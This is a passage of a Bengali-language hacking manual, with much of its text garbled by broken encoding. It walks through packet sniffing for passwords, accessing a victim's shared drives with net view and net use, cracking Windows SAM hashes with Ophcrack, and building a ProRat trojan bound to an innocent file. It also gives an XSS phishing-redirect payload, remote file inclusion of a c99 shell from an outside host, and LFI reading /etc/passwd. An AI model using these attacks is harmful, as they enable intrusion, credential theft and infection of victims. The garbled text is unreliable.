��� � � wireshark +(�x�� �� ���� ����� Packet sniffing +" ����� )�। Packet sniffing � +��*����A� ��# �"�� ,�*�� Packet £��� #��� ���� !���।packet sniffer �� ����, ���� wireless network � ��(��� ��� : usernames, passwords, IM conversations, and e-mails �� �� £��� +��� ���� । t. www.wireshark.org N�!����N ��� �°�� ���� । O. &��� ��� ��� ��� ��� ���&� '��� ���� +" �� ���� ।
![Page 68: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/68.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
68
w. ���-A� ����¼ ��� start � ��� ��� packets capture ��� �� ��� । |. ,�" �� �� �� )���� +����� ����¼ ���� �� ���� ��'�FP ��F� ��� +,�� +��� +" �� +��� packet ���' +��� ����¼ ����। � ��� �#���� packet �������B�� ��,A�� +" �� ।
~. Wireshark ��$��� ���� ���� ��� )� ��� Windows Live &��� ����� ��� ���� +���) ���G�� +������ +" ����। ���& ���� �������� +"� �।“msnms” Ø��� �/¤�� ��� Windows Live �� packet ���) +�� ���।
![Page 69: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/69.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
69
�.���� +���) ���& +" ���� ���'।,�" ����� ��� +" �� ���� ���� ����� �������� +" �� �����।. Usernames ��� passwords ,�" encrypted ��� �� ���� ��� $��� �� +" � ,��� । ��* ��'� sniffing ���� +(�x��� http://www.monkey.org/~dugsong/dsniff/ http://www.snort.org/ http://monkey.org/%7Edugsong/dsniff/
+�����*��� �sPA ��� � +��*���A ����� �����-�!���� �����।���� ��#�� LAN �� WAN � +/����,/���,�(��� ����� �NC Ï��$* +���� ��� )��।�� )� �#� ��� ��� �)��� "���� ��
t.���-A� +���� ।
O.���-A� +������ tw� +���A�� + ��� ����� �� ।
��� � ��� +���A���*� �� ��#�� ���-A� +����� ��$��� +���� ,�� �� +" ����......
![Page 70: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/70.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
70
t .(��� +������ ���� ���-A� +���� ��) +�� ���� �� ।�� ��)�� ���� )� Angry IP scanner http://www.mediafire.com/?nyyuaydw9gi �/�*��� N�!����N * �°�� ��� ��*।
O .���� ���� ���)� �'§�� +��É� �$�� ���� ��&A ���� ।
http://www.cmyip.com/ +��� �� �� ���)� ���� )���� �����। ��� �� �������� +��É� �$�� ���� ��&A ����।
w .���� ���� ��� (���)� ���� tw� ��� +���A +��� +-�� C�� �� ��� । �&��� ���� ��Î��� �B� �&Õ ���� � &�� "�* ��� ���� ���� �� Yes "�* ।
8 .�z � tw� ��� +���A ��� ok "�* ।
![Page 71: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/71.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
71
~".Start "���� � &�� +"*�� �� C�� +��E ���� /��/� +" ��� ।
� .+,�� +" � ,��H OO| �� ����C�� ����' ,�� ��# t��� +���A tw� ��� + ��� ।
![Page 72: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/72.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
72
�.Start > Run >cmdcmdcmdcmd��� ><ENTER> +&�� ���� (���� &��� ���� । � .� � ������ “nbtstat nbtstat nbtstat nbtstat ––––a TargetIPaddressa TargetIPaddressa TargetIPaddressa TargetIPaddress” ��� �}�� ���� ��,,�� ��#�� +��.� ,��� /��� ��� �(��� +������ &��� ���� । ��� ��� ���� �� ।
![Page 73: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/73.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
73
� .,�" +���� �� ����� ���� <20>�� � ��� ���� +��.�,��� /��� +������ &��� । +,�� �&���DAVIDS-MACHINE �� ���� <20> �� � ��' ।,�"<20> �� �� +��� � ���� +��.� ,��� /��� +������ �� । t .���� ���� +� “net view net view net view net view \\\\\\\\TargetIPaddressTargetIPaddressTargetIPaddressTargetIPaddress” ���� �� �"�� �� । ,�� ��#�� +��.� ,��� +��� +��� /���, �(���,+/���� +���� ��� ।
tt .� ��� ��� �(��� +���� ��� ����' । ,�� ��� SharedDocsSharedDocsSharedDocsSharedDocs।� � ��� +,������ �(��� ���� ��*«�� ���� ������ । tO .������ SharedDocs�N�C (��� ���� )� ���� ����&� ������ �� ,�� ��#�� ����� �N�C ���«� ��� ,��� ।
![Page 74: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/74.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
74
tw .����&� ���� ���� )� “net use G: net use G: net use G: net use G: \\\\\\\\TargetIPaddressTargetIPaddressTargetIPaddressTargetIPaddress\\\\DriveNameDriveNameDriveNameDriveName " " " "���� �� �"�� �� । � �� ���� �� �� “net use G:net use G:net use G:net use G:\\\\\\\\192.168.1.101192.168.1.101192.168.1.101192.168.1.101\\\\SharedDocsSharedDocsSharedDocsSharedDocs”. G:// �� ������A � Ï��$ �� ��� * +"*�� ,��� ।
t|. +" �,��H G ����� Ï��$ ��-� +���� ����' । � � �� ����� ??? +�� । +�� �& � N� /� ��A,+���� ��� ����� ��� $���� !��� �)�§�-। ��� ���!��� +��� +�E Ï���$� ��� +"� ���� ������A ���� ।�� �� ���� +�E Ï��$ J: । ��� ���� J �"�� �"�� �� ।
t~ .�G� ���� ���� +�E �� ������!���� ���� +��*���A Ï��$ +�� ���� । �� ��#�� �� ��� ,��� ।
![Page 75: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/75.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
75
!����) ���*��NA }����
!����) }�� ���� )� Ophcrack ����� +(�x�� ���� ����� । �� ��#�� !����) �z��,�$D�,+��$��� ���*��NA �� ��� ,�� । �z���� ���*��NA }���� �) ��¡ �$D� �� +��$�� �����y� +��� ����� ����� ��G� ।LM (Lan Manager) +��� �� }�� ��� ���*��NA �� ��� � ,,�� )� +������ +���� ���� ��� � । �� �� ���� ��� ,��-�� ।�£� �H�
#C:\WINDOWS\system32\config �� �$���,,� �� �!)���"� )� �� । #��� HKEY_LOCAL_MACHINESAM +��)�{ �� ��#, ���* ��� �!)�� +"� )� �� ।
� � �� �� ��� �� �����,+, �� �� ����� ??? +�� �� )� ���� ��� �J�� ����' । #����z ���$ ���N +��� SAM /��� �!���� ��� ò���� ��� ���। #Ophcrack�� PWDUMP+(�x���� ���� ��� +��)�{ �� +�� ��� ,��। t .(��� Ophcrack http://ophcrack.sourceforge.net/ N�!����N ����।
O .N�!����N +�E �� �°�� ���� । �°�� +�E �� +������ +���� ��� ���� ��£��� ��� !�G�� �"� ।
![Page 76: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/76.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
76
w।��� �°�� *��� �� �}���� *�������� �-�� +��$�-�� +��� +���� � ��� ����।� ��� �� �� �� #���� +���� ����।�" ��� ���H� ,� +��� F� ����� +����� +������ ���)* �� �^ ��।������ ������� ����� ��,��� +���� +��' ��* ।
![Page 77: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/77.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
77
![Page 78: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/78.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
78
|।� ��� ��� �� +��� �^ +������� +��' �����'।���� ophcrack &��� ��� +���� � ��� ����।+����� N�!����N ��� +������ +"� �� �"�� OK &����।
![Page 79: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/79.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
79
~।���� ���� PWDUMP &��� ��� ���*��NA $�î�� +&r� ���।�� )� +����� ��� ���$����� �� ��� �"�� ��।
�। Load � ��� ��� Local SAM ����¼ ����।��� +����� ���!���� ���� ��� �������B� ��� ���*��NA �� +" ���।
![Page 80: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/80.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
80
�।���� Crack � ��� ���� ���*��NA £��� }�� ���� �� ����।
�।���� �� �� ���Î�� �&��� �� ���� !���� +" �� ����।
� .�� �� � � +" �� ��H ���� ����� ���!� �� ��# ���� ���!� ���� ����� �� ��# }�� �� +-� -
• Bob :lolcats
• David M: not found
• Pushkin: Christmas02
![Page 81: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/81.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
81
Ophcrack ���$ ���N
!����) �� }�� ���� ���� �J�� +,�� ���� � � +" � �� ophcrack ���$ ���N �"�� ��� � -
t.ophcrack website http://ophcrack.sourceforge.net/download.php?type=livecd � ,�* ��� +����� ������� ������� ���$ ���N�� N�!����N ����।
O. .ISO /��� +,�� N�!����N ���' �� �"�� ���� ���$ ���N ����* +,$��� !���� �� �� ������' Linux chapter � ।
w .���N �� ���N Ï���$ ����* ��� ���N +��� ��� ���� )�� �����A "�*।
| .�� �� ���� ���� –
![Page 82: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/82.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
82
~.Graphic mode Graphic mode Graphic mode Graphic mode � Enter +&�� � +���� ��F� ����,,�" ��� �� �� � ��� ��'� �� +" � ,�� ���� ���� ������ &������ Ophcrack Graphic VESA modeOphcrack Graphic VESA modeOphcrack Graphic VESA modeOphcrack Graphic VESA mode � ,�* । ,�" �� ���* ��) �� � ���� Ophcrack Text mode Ophcrack Text mode Ophcrack Text mode Ophcrack Text mode �� ��#�� ��� "�*। �.Ophcrack �°�� +�E �� ���)� +���� ���*��NA }�� ��� �� ����।
![Page 83: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/83.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
83
Countermeasures
���� !��� ��' ,�� ��#�� +�����*��� ��� Ophcrack �}���� +��� ��&� ,��।
t .NetBios �}�� +��� �F� +��� �(��� ��� /��� +����� �� ��� �। !����) �$D� ��� � � �� ��� ����।�z���� �� ��� ���� � ।
#Start Start Start Start ----> Control > Control > Control > Control Panel Panel Panel Panel ----> Network Connections> Network Connections> Network Connections> Network Connections ,�* । #&��� ���� ���,�- � N��� ��� ����। � ��� ���� ���,��-���� Wireless Network Connection 2Wireless Network Connection 2Wireless Network Connection 2Wireless Network Connection 2। # Properties# Properties# Properties# Properties � &�� "�*। # ,�" File and Printer Sharing File and Printer Sharing File and Printer Sharing File and Printer Sharing � ��� +"*�� ���� ���� ��� !�G�� ok ����।
![Page 84: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/84.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
84
![Page 85: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/85.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
85
![Page 86: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/86.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
86
����� � � � #�� #�� #�� #��
���*���
��A���� ����� ���� �� +��� ���*��� Ø��� �}� �H । �)�� �)�� +���� ����E ���*��� Ø��� �}� � ।��� �£�� �H ���� (��� $�����, +��)��,*���A । �� #��� ���*��� �� ����&�� ��� ��"� ���� ����A ����&�� ��� ��। �� )� ����"� MAC �� ����z ���� ��� !�&�,���P ��"� ���*��� �� ।
����&��
t.$�����-���!��� $����� � �� #���� ���!��� +(�x�� ,� �������B� ����� �� #��P� '�^�� ���) ���)� ��� �� ���� ।+�����/A� $������� �� ���� (�I � $������� ���£����� ������A� ���� ���� ��� ���£��� ���)��� ������A� �� ���� ।���� $����� �� ���!��� +��� �� ���!���� +,�� ���� +������ , � �}� ���!����� ¬�$���� ���!������ ���' ���� ,�*�� �।+,�� +��� �������B $��������� ���� +�� *����A� ��#�� ��G��� ���� �� +��� ���,�- ��#� ,�� ò�� �NC, ���N, �!���� Ï��$ �� �ó������� ��#�� '^��� ���� ।�'�^�* $�������s +��� +�� *���A /��� ������� �}� ���� ����, ,�� /�� ��� ���!��� ,� ô ������� ���� ��� +�£��� �}� �� ����।$������� � ��� ���!��� *���A * +��)�� ��A� �� ���� ������ +/�� �।
O.+��)�� �A - - - - - +��)�� �A � ���� /��� ,� ��z��!��N ��� �- �,A F��B� ���� । ��� /��� +����,/��� ,���*��NA ����" &��� ���� ���) ���� � ।
w.*���A - *���A �H �� #���� $����� ,� +����� ����� /��� +� �}� ��� �� ��'� ���)� ���y ��� । ,� ����AB�� /��� ���� ���� ���� )�� /�� *���A �� ������ ��^�� ����।
~.��������� - - - - /��� ��� ��� ���� �� ��sPA +������,+��, �NA�NC $��� ��� +/��।�� /�� /��� ����� ,��।
![Page 87: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/87.jpg)
Blended Threats---- ��� !���� �� £��� ���� ,�� ��� ���� ��� � !���� �� £������r ����' ।
www.mediafire.com/?b1x1anfjxmx���� +��)�� �A। t .+(�� �� N�!����N ��� &��� ����O.�&��� �� ��� ��) ����।
w.���� ���� ����� ��� �� ��)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
��� !���� �� £��� ���� ,�� ��� ���� ��� � । �� ��# ।
+(�� �� ProRat www.mediafire.com/?b1x1anfjxmx +��� +(�� �� N�!����N ��� ��*।+(�� �
N�!����N ��� &��� ����।
���� ���� ����� ��� �� ��) +�� ! Create ProRat ServerCreate ProRat ServerCreate ProRat ServerCreate ProRat Server ���� ��� ����
www.facebook.com/p1n1x.cr3w
87
�� ��#
+(�� �� �H
���� ��� ���� ।
![Page 88: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/88.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
88
|. ���� +����� ���� )��� ����� IP ��Ï� ��� �।IP �� )��� ����� www.cmyip.com +��� ���� +)�� ��*। ����AB�� +����� ����� ��Ï� ��� � ।
~.���� General settings ����� &�� �"�� Server port,Server password ��� Victim Name �s�P ���� ।
![Page 89: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/89.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
89
�.Bind with File ��� +��� /��� ����¼ ���� । ��� �� �� �� +, +��)�� (��� ��!�� &��� ��� �"�� � । �� )� ��� /��� �"�� �� +,� +� ��� *��� ��� । ��� ��� .txt /��� ����¼ ����' ।
![Page 90: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/90.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
90
�. ���� Server Icon ���� �H� ���� ���� ����¼ ����।���� ��� +�z� /��� �� ���� +"*�� $����।
![Page 91: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/91.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
91
�.Server Icon ����� &�� "�* ��� ���)� �H� ���� ���� �'§ ���� ।
![Page 92: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/92.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
92
�.Create Server � &�� "�*।��� ��� ��$A�� /��� �� ���� ���� �����। /����� �&��� ���� �� ।
tÂ. ������ /��� �� ��� ��� +"� ,��� �� �� ���� )�� /����� *��� ��।
tt.� � ��� ���' ��$��� ����� /���" �^�� #��� �।
tO./��� �� �°�� ���� �� ���*��NA &��� ���*��NA +"*��� �� ����� �� ����� ���� +����� ��� ��� ���� ।
![Page 93: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/93.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
93
tw.� � +����� ��� ��� ���,*� ����� +,������ ��'� ���� �����।
![Page 94: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/94.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
94
t|.���&� +���)�� +" ��� ,�" �� ��।+���) ��G�*।
![Page 95: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/95.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
95
t~.�� �� ,�" ��C��� ��N ���� ���� ����� ��� +" ���।
![Page 96: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/96.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
96
t�.�B��� ���� ��� +" ���।
!���� ��) £��� ��� +��)�� ���� ��� ���� ��� � । ���� ��� � ��� �)� ���� lmfaooooooooooo
(������
��� ���A��� ���� ��) ���� � । ���� $����� �} �� �।��'� �J�� ��' ,�� ��#�� $����� +��� "s�� ���� ,��।
#������ ���N�� $���� ��ó$����� �°�� ���� ��।
#!����) �� Fire wall � ���� ��।
![Page 97: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/97.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
97
����� � � � #�� #�� #�� #��
*��� ����
���� � � *��� 2.0 ,��-� ��î ��',*������� ��A���F� -���B� ��� users +"� content �� ���� interact ���� +"�।*����� �� !%��� ���� ���� �����"� * ��� !%�� ���'।�� #������, ���� *��� ���������� ����J �}��P� )��(� ��'� �J�� ���� ����&�� ���।
}� ���� ����� (XSS)
Cross site scripting (XSS) � �� � , � +��� �!)�� ��������� +��N +��� website � (��� ����।,�� ����� *��� ������� ��� $��� ��) ��� ,� ��� ���� ��� ��।XSS attacks ��� )��(� ��� ��� �^ website �� Ø��� �}� ���' ,�� ���. FBI, CNN, Ebay, Apple, Microsft,AOL ����'। ��'� *������� �/&�� XSS attack �� )� vulnerable +,��
• Search Engines
• Login Forms
• Comment Fields
� ��� w ����� XSS attack ��'।
t।Local-Local XSS attack �� ��� ��� ��� ��� ��G�।�� attack �� )� browser vulnerability � exploit "����।�� #���� attack �� ��#�� �� )� ���� +����� computer � worms, spambots, install ���� ����।
O।Non-Persistent – Non-Persistent attack � �� +��� ��#��� attack ��� �� ���� *��������� +��� F�� ��� �� ।Non-persistent attack �� ��#�� *�������� ��#��P
![Page 98: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/98.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
98
��'� ��� &������ ,��।�� attack �� �#� ��� +��N ��� URL �� ��J� �B���J �A�² ��Ï����� ���"Ar URL (��� ������ �� attack �� /� ��*�� ,���।
w।Persistent –Persistent attack ��#���� guest book, forum,shout box �#���� *��� ��������� ����J ��� �।���� persistent attacks �� ��#�� �£��� ���� �����
• *��������� �� �� &���,
• *���A '^��� ����,
• ����� *������� �N�/�* ���� ����।
� � �� �� ,�� cross site scripting �� ।���� *������� ��$��� vulnerable �?
t। ,�" * ��� search field ���� ���� ���� �� (��� ���*।,�" �� �� ���� +��) ���� +" �� ���� +��� vulnerable *��� ���� ����� ��'।
O। � � ���� ��'� HTML (��� ����।���� <h1>hi</h1>,(��� ���� ,�" ���� ¬�$������ +��� �^ �����(�&��� ��) “hi” +" ��।
���� �� vulnerable।
w। � � ���� JavaScript (��� ����। <script>alert(“hi”);</script> ��� Search ���� ,�" “hi” ���� ���� ��z +" �� site �� XSS �� )� vulnerable।
![Page 99: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/99.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
99
|।��� !"���� £��� non-persistent।,�" +��� ���� guestbook �� ��� +��� ��'� ��� ,� vulnerable ���� ���� persistent ������ �����।
���� ,�" JavaScript * PHP � ���"�AB ���� ���� +� advanced XSS attack �� ��#�� +����� cookies &��� ���� ����� * XSS worms '�^�� �"�� �����।��� +" �� phishing �� ����, ���� ��$��� xss ���� ���।
t। ��� ��� ���� www.victim-site.com +��� password &��� ���� &��।,�" +� *������� �� +��� )��-� +��� XSS vulnerability ��) ��� ���� +� ���-A� *������� +� ��� �/��� *�������� redirect ��� ���� �F� ��।
O।!"���¬×� ��� ,�" JavaScript �� search box � (��� ���� ���� +, URL �� ����� �� �� +" �� ���&� �� ��।
w। URL � ?searchbox= ��� &search �� ���. �� ���� ���&� JavaScript code Ø��� replace ���� ���
![Page 100: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/100.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
100
<script>window.location = “http://phishing-site.com”</script>
|।����� finished link � +-�� ���-A� *��������� �/��� *�������� redirect ��� �"�� ।URL +� ��* ��� * �� ��§)�� +" ��� ���� ��� encode ���� ����।�� �� ���Î� *��������� +��� encode ���� ���।
http://www.encodeurl.com
~।������NN URL �� �� ����
http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
![Page 101: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/101.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
101
������ /��� ������
������ /��� ������ (RFI) �� ��#�� ����� *��������� /��� ���-A������ Include ��� �।��#��P� +, /����� include ��� � ���� ��� Shell ,� ���� +� server side command execute ���� +"� ��� +,���� /��� access ���� +"�।
��� ��$A��� RFI vulnerable।���� PHP �� default settings ����� register_globals * allow_url_fopen ���� ����� ��� ����।,�"* PHP 6.0 �� register_globals ����$ ��� ���'।� � +"� ��$��� ���� *������� �� vulnerability �z���� ���।
t।���� ���� *������� ��) +�� ���� ,� ��� +�) £��� PHP () function �� ��#�� +��� ���� �� ,� RFI �� )� vulnerable।+���� $�- ���� Google dork ���� ��� RFI �� )� vulnerable ���� +�� ����।
O।+, �� Website �� +��$�-�� ������ � )��-� +��� +�) �� ��� � +,��
http://target-site.com/index.php?page=PageName
w।+�)�� vulnerable �� ���� *� PageName �� ������A ���� *������� include ���� +&r� ����।
http://target-site.com/index.php?page=http://google.com
|।,�" *�������� Google +����) +" �� ���� ���� ��.�� +, *��������� vulnerable ��� shell include ���� ।
~।)��(� ��� shell � c99 * r57।�����"� ��� ���� remote server +��� upload ���� �� �� Google dork Ø��� +, *�������� upload ��� ��' �� ��) +�� ���� ��
![Page 102: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/102.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
102
* include ���� ��।shell �)�� ���� Google � inurl:c99.txt ��� search �"�� ���� । ��� *��������� c99.txt ��*�� ,���। URL �� +��E ? +,�- ���� ��।���� ,�" c99.txt �� �� ��'� ��� ���� �� shell � pass ��� +"��।��� � URL �� shell � +" �� ��� ��
http://target-site.com/index.php?page=http://shellsite.com/c99.txt?
�।���.���. server �� PHP script � .php +" � ,�� (��� /��� �� ��। �� �� shell include ���� �� +" ��� “c99.txt.php" /�� ��� ��) ���� ��।��� "s� ���� +������ ���� null byte (%00) +,�- ���� �� ।
�।t �� � ��� ���' +, ���� Google dork �"�� RFI vulnerable *������� +�� ����।#�� ���� Google dork �� allinurl:.php?page= ��� php?page= � URL ��)।��¡ �� ��) vulnerable site ��*�� ,�� ��।������ ��#��P� 1337day �� �� �z���� N������� RFI Vulnerable *��������� �z���� ���)।
![Page 103: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/103.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
103
�।,�" ���� ���$�� �� shell, parse ���� ���� ���� +� ���&� screen +" �� ����।
shell �� remote ��$A�� �� �� £��� +" ��� ��� �� /��� * directory �� list +" ���।
![Page 104: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/104.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
104
�।���� ���� root privilege ��*��� +&r� ����।+����� �z���� �����N ��� * run ���* +� root privilege +��� ����।
�� RFI attacks +��� ��&�� &���� up-to-date scripts ���� ���� ��।�� ��$A��� php.ini �� register_globals disabled ���� ��।
![Page 105: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/105.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
105
+����� /��� ������
+����� /��� ������ (LFI) �� )� ��$A��� directory transversal �� ��#�� ¯�!) ���� F��� ����� ��।LFI �� ��#��� ���� � /etc/passwd +�� ���।�� /���� ����z ������� �!)���� +-��� �� ����।RFI �� ��� ����� ��� $��� vulnerable *������� ��*�� ,��।#�� ���� vulnerable *������� �� www.target-site.com/index.php?p=about
directory transversal �� ��#�� +� /etc/passwd browse ���� +&r� ���� �$����
www.target-site.com/index.php?p= ../../../../../../../etc/passwd
,�" ���� /etc/passwd /��� +��� ,�� ���� +� ���&� �� +" �� �����
Root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
![Page 106: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/106.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
106
(���� ���� ����� ����A $�- ���।
username:passwd:UserID:GroupID:full_name:directory:shell
